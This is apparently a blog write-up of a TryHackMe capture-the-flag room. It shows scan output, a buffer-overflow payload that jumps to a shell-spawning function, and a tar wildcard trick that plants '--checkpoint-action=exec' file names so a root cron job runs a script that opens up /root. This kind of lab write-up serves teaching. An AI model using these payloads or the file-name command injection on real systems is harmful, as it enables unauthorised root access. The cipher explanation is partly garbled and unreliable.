Anonymous Playground: THM writeup

Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 60:b6:ad:4c:3e:f9:d2:ec:8b:cd:3b:45:a5:ac:5f:83 (RSA)
| 256 6f:9a:be:df:fc:95:a2:31:8f:db:e5:a2:da:8a:0c:3c (ECDSA)
|_ 256 e6:98:52:49:cf:f2:b8:65:d7:41:1c:83:2e:94:24:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/zYdHuAKjP
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proving Grounds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HomePage
Operatives.php
hE = m
zA = a
dC = g
fH = n
zA = a
The cipher looks like :
final = ord(second_character)-64+ord(first_character)
#If character lies above "z" in ascii table thenif final > ord("z"):
final = (final%ord("z"))+ord("a")-1
chr(final)
  • First, convert the ASCII of the second character to alphabetic number
    i.e 'A': 1
    'B' : 2 ....
  • Add this to ASCII of the second character and find the resulting character.
  • If the resulting character is higher than the ASCII value of z then higher value is to be added to the ASCII value of a
magna :: <Password>

Inside the system

main function decompiled using ghidra.
call_bash function decompiled using ghidra.

Buffer overflow

$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld
$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" > ro
#Store the exploit is a file
$ gdb ./hacktheworld # run gdb
(gdb) break call_bash # set breakpoint call_bash function
(gdb) run < ro # run the program with the input from ro
Starting program: /home/magna/hacktheworld < ro
Breakpoint 1, 0x000000000040065b in call_bash ()
(gdb) c
Continuing.
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
Breakpoint 2, 0x00000000004006d0 in call_bash ()
# we are hitting the second breakpoint
(gdb) s
Single stepping until exit from function call_bash,
which has no line number information.
__libc_system (line=0x400803 "/bin/sh") at ../sysdeps/posix/system.c:180
180 ../sysdeps/posix/system.c: No such file or directory.
(gdb)
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
*/1 *   * * *   root    cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
$ echo "ro" > "--checkpoint=1"
$ echo "ro" > "--checkpoint-action=exec=sh ro.sh"
$ echo "chmod 777 /root" > ro.sh

--

--

--

Infosec Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Digital Product Development Is Fueled By Data and Analytics Strategies That Have Become Integral…

XSS Reflected - nonpersistent on cimb bank

DDoS: The most dramatic cyberattack

ZRC2 XCAD V1 to V2 Migration

{UPDATE} Mad Truck 2 Hack Free Resources Generator

🎉AMA: Ark Rivals 🤝 GemMouse 🐁

Superyachts are super Cyber Attack Targets

One of the Biggest Security Problems Smart Product Developers Are Missing

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Roshan Guragain

Roshan Guragain

Infosec Enthusiast

More from Medium

wtfCTF 2022— web challenge [1–4] WalkThrough

Brute It: TryHackMe: Writeup:-

Lian-Yu — TryHackMe, WriteUp

Plotted-TMS Writeup